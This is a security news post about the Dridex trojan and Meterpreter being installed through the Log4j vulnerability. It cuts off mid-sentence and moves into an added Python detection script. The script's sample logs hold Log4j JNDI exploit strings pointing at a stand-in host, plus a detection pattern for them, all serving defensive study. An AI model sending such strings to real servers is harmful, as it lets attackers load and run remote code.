Dridex Malware Installed With the Help of Log4j Vulnerability

The Dridex malware is a banking trojan that was originally designed to steal victims’ online banking credentials but has since evolved into a loader that downloads modules used to perform a range of malicious actions, such as installing additional payloads, spreading to other devices, taking screenshots, and more.

Dridex infections have been linked to ransomware attacks carried out by operations associated with the Evil Corp hacker gang.

What Happened?

Cryptolaemus, a cybersecurity research firm, has warned that the Log4j vulnerability is currently being used to infect Windows devices with the Dridex Trojan and Linux devices with Meterpreter.

We have verified distribution of #Dridex 22203 on Windows via #Log4j #Log4Shell. Class > MSHTA > VBS > rundll32.
Class: https://t.co/ivdZSd1QGR
Payload URLs: https://t.co/RoZubNKUs5
DLL sample: https://t.co/6P8aHdim8v
HTA > DLL run: https://t.co/KdGZfmHkMN pic.twitter.com/IsoYWfdKcq

— Cryptolaemus (@Cryptolaemus1) December 20, 2021

According to Joseph Roosen, threat actors harness the Log4j RMI (Remote Method Invocation) exploit variant to force susceptible devices to load and execute a Java class from an attacker-controlled remote server.

As explained by BleepingComputer, when the Java class is launched, it will first try to download and launch an HTA file from multiple URLs, which will install the Dridex trojan. If the Windows instructions cannot
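The two stages described above (the Log4j JNDI lookup that pulls in a remote Java class, and the Class > MSHTA > VBS > rundll32 execution chain reported by Cryptolaemus) each leave a trace a defender can look for. The following Python script is an added example written for this page; it is not code from Heimdal, BleepingComputer or Cryptolaemus. It scans constructed web-server log lines for JNDI lookup strings and walks a constructed, Sysmon-style process list to flag rundll32.exe instances whose ancestry runs through java.exe, mshta.exe and a VBScript host. All sample data, file paths and the 198.51.100.7 address are made up for the demonstration.

```python
import re
from typing import Dict, List

# Stage 1 indicator: a Log4j JNDI lookup in request data. Case-insensitive;
# production rules also normalise Log4j's nested-lookup syntax, which is
# deliberately left out of this illustration.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*(rmi|ldap|ldaps|dns)\s*:", re.IGNORECASE)

# Constructed access-log lines (not real traffic). The second and third carry
# lookups in the User-Agent and query string respectively.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [20/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [20/Dec/2021:10:01:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:rmi://198.51.100.7:1099/a}"',
    '10.0.0.9 - - [20/Dec/2021:10:01:09 +0000] "GET /?q=${jndi:ldap://198.51.100.7:389/b} HTTP/1.1" 404 0 "-" "curl/7.68"',
]

# Constructed process-creation events (pid, ppid, image), loosely modelled on
# Sysmon event ID 1. PIDs 200-500 form the chain the page describes; 600-700
# are a benign explorer.exe -> rundll32.exe pair.
SAMPLE_PROCESS_EVENTS = [
    {"pid": 100, "ppid": 1,   "image": r"C:\Windows\System32\services.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Program Files\Java\jre\bin\java.exe"},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\mshta.exe"},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\wscript.exe"},
    {"pid": 500, "ppid": 400, "image": r"C:\Windows\System32\rundll32.exe"},
    {"pid": 600, "ppid": 100, "image": r"C:\Windows\explorer.exe"},
    {"pid": 700, "ppid": 600, "image": r"C:\Windows\System32\rundll32.exe"},
]

# Stage 2 indicator: ordered ancestry stages. Each stage is a tuple of
# acceptable image names (VBS may run under wscript or cscript).
EXPECTED_CHAIN = [
    ("java.exe", "javaw.exe"),
    ("mshta.exe",),
    ("wscript.exe", "cscript.exe"),
    ("rundll32.exe",),
]


def find_jndi_lookups(lines: List[str]) -> List[Dict[str, object]]:
    """Return one hit per log line containing a JNDI lookup, with its scheme."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = JNDI_LOOKUP.search(line)
        if match:
            hits.append({"line": number, "scheme": match.group(1).lower(), "text": line})
    return hits


def image_name(path: str) -> str:
    """Lower-case file name of an image path, tolerant of either slash style."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def ancestry(pid: int, by_pid: Dict[int, dict]) -> List[str]:
    """Image names from the root-most known ancestor down to pid (cycle-safe)."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(image_name(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    chain.reverse()
    return chain


def matches_chain(ancestors: List[str], stages=EXPECTED_CHAIN) -> bool:
    """True if the stages appear in order (as a subsequence) within ancestors."""
    stage = 0
    for name in ancestors:
        if stage < len(stages) and name in stages[stage]:
            stage += 1
    return stage == len(stages)


def find_dridex_like_chains(events: List[dict]) -> List[int]:
    """PIDs of rundll32.exe processes descended from java -> mshta -> VBS host."""
    by_pid = {event["pid"]: event for event in events}
    return [
        event["pid"]
        for event in events
        if image_name(event["image"]) == "rundll32.exe"
        and matches_chain(ancestry(event["pid"], by_pid))
    ]


if __name__ == "__main__":
    for hit in find_jndi_lookups(SAMPLE_ACCESS_LOG):
        print(f"JNDI lookup ({hit['scheme']}) on line {hit['line']}: {hit['text']}")
    for pid in find_dridex_like_chains(SAMPLE_PROCESS_EVENTS):
        print(f"suspicious rundll32.exe pid {pid}: {' > '.join(ancestry(pid, {e['pid']: e for e in SAMPLE_PROCESS_EVENTS}))}")
```

The ancestry check is ordered but not adjacent, so an intermediate cmd.exe or conhost.exe between stages does not hide the chain; the benign explorer.exe > rundll32.exe pair is left alone because it never passes through java.exe or mshta.exe. In practice the log scan would run over the application's request logs and the process check over endpoint telemetry, and a JNDI hit followed by the chain on the same host is a strong signal worth an immediate response.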

Read More: https://heimdalsecurity.com/blog/dridex-malware-installed-with-the-help-of-log4j-vulnerability/